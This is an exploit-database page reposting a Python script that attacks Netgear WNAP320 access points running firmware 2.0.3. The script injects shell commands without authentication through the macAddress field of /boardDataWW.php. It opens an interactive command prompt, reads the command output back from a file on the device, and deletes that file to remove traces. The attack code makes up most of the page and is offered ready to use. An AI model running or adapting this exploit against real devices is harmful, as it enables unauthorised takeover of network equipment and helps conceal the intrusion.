Advertisement






Netgear WNAP320 2.0.3 macAddress Remote Code Execution (RCE) (Unauthenticated)

CVE Category Price Severity
N/A CWE-119 $10,000 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2021-06-28
CPE
cpe:cpe:/h:netgear:wnap320:2.0.3
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.93988 1

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060164

Below is a copy:

Netgear WNAP320 2.0.3 macAddress Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)
# Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# IoT Device: Netgear WNAP320 Access Point
# Version: WNAP320 Access Point Firmware v2.0.3

import requests
import sys

if(len(sys.argv) != 2):
print('Must specify the IP parameter')
print("eg: python3 wnap320_v2_0_3.py <IP>")
sys.exit(0)

host = sys.argv[1]
port = 80

cmd = ''

while(True):
cmd = input('Shell_CMD$ ')
#injecting system command part writing the command output to a output file
data = {
'macAddress' : '112233445566;' + cmd + ' > ./output #',
'reginfo' : '0',
'writeData' : 'Submit'
} 

url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)

if(response.ok):
#read the command output result
url = 'http://' + host + '/output'
cmdOutput = requests.get(url)
print(cmdOutput.text)

#remove trace
cmd = 'rm ./output'
data = {
'macAddress' : '112233445566;' + cmd + ' #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
else:
print('[!] No response from the server.')

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.